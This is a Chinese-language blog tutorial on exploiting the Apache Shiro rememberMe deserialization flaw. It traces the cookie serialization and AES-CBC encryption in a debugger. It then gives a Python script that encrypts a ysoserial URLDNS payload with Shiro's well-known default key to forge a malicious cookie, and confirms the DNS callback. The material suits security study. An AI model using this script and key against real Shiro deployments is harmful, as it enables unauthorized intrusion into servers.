前言
讲了FastJson反序列化的原理和利用链,今天讲一下Shiro的反序列化利用,这个也是目前比较热门的。
原生态反序列化
我们先来复习一下原生态的反序列化,之前也是讲过的,打开我们写过的serialization_demo。代码也很简单,先是读取一个文件,接着对其进行反序列化,最后再一个main函数去调用这个方法。
我们利用ysoserial这个工具生成一个dnslog利用链,写入到urldns.txt文件中。
运行上面的代码,对urldns.txt文件进行反序列化,可以看到在dnslog平台有回显。
shiro反序列化
现在开始说一下Shiro的反序列化,Shiro框架提供了记住密码的功能,cookie含有rememberMe字,⽤户登陆成功后会⽣成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码-->AES解密-->反序列化。攻击者只要找到AES加密的密钥,就可以构造⼀个恶意对象,对其进⾏序列化-->AES加密-->Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进⾏解密并且反序列化,最终造成反序列化漏洞。
网上找的一个Shiro demo,下载好就直接部署就行,具体如何部署就不说了,网上有。
登录抓包看一下,发现确实存在rememberMe字段,而且后面有一大堆值。
现在来分析一下,打开我们的login.jsp,可以看到是调用了include.jsp的。
接着去打开include.jsp看看,这里是引用了org.apache.shiro.SecurityUtils这个类。
可以在相应的位置找到这个类,其实它就是一层一层的引用的。
我们全局搜 rememberMeSuccessfulLogin,找到之后下个断点,来一步一步跟进看看是咋回事。
如果你搜不到的话,来到Maven这里把这个包下载一下就行。
接着以调试模式运行Tomcat,此时我们在登录页面进行登录,就可以看到已经代码断下来了。
开始步入,来到这里可以看到进行了一个判断,如果RememberMeManager的值不为空就进入,也就是说我们进行登录要勾选 "记住我" 才会触发判断。
我们一直步入,因为前面都是一些代码逻辑,没啥看的,代码到这里就出现了序列化,principals 的值就是我们的用户名 root,这里对 root 进行了序列化操作。还对 getCipherService() 进行了判断,如果不为空就进行加密,从字面来看这个方法应该是获取密码的。
接着往下跟进,这里调用了getSerializer().serialize() 进行序列化。
跟进到这个serialize 方法里面,里面的代码是不是和我们上面原生态的序列化差不多,这里调用了 ObjectOutputStream()这个类,并且还调用了这个类里面的 writeObject() 方法对 o 进行序列化,而 o 则是我们的用户名 root 。
这个 root是我们可控的,那么就基本满足了反序列漏洞的条件了。
接着再继续跟进看看,来到了加密这里,我们要知道是啥加密类型才能进一步的利用。
下面参数这里有个key。
展开参数 this ,发现modeName的值是CBC,那么可以猜测这是AES-CBC加密方式。
这个transformationString 就更进一步证实了我们的猜想。
跟到现在基本就可以确定。
发送数据的时候:数据--->序列化--->aes加密--->base64编码
接受数据的时候:base64解码--->aes解密--->反序列化--->数据
base64是可逆的,反序列的数据是可控的,那么我们现在只需要知道AES的Key、iv、mode,是不是就能构造出恶意的 RememberMe 的值了。
上面跟踪的时候我们获取到了Key和 iv 这两个值,但这里只是Ascii码,直接叫AI写个脚本把Ascii码变成base64字符串就行。其上上面说的先AES加密再base64加密,其实是不严谨的,base64只是编码了我们的Key,并没有对AES加密之后的数据进行base64编码。
我们用ysoserial 生成一个dnslog利用链。
再用下面这个脚本对我们的链条进行aes加密,Key是我们上面转换过来的。
from Crypto.Cipher import AES
import uuid
import base64
//若提示ModuleNotFoundError: No module named 'Crypto'
//需安装pycryptodome库:pip3 install pycryptodome
def convert_bin(file):
with open(file, 'rb') as f:
return f.read()
def AES_enc(data):
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data))).decode()
return ciphertext
if __name__ == "__main__":
data = convert_bin("urldns.txt")
print(AES_enc(data))生成加密之后的数据。
替换掉原本的值进行发送。
成功解析。
上面的DNS链条只能访问一下dnslog,如果想要执行命令的话,要用到CC链才行,这个下次详细的讲。
总结
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。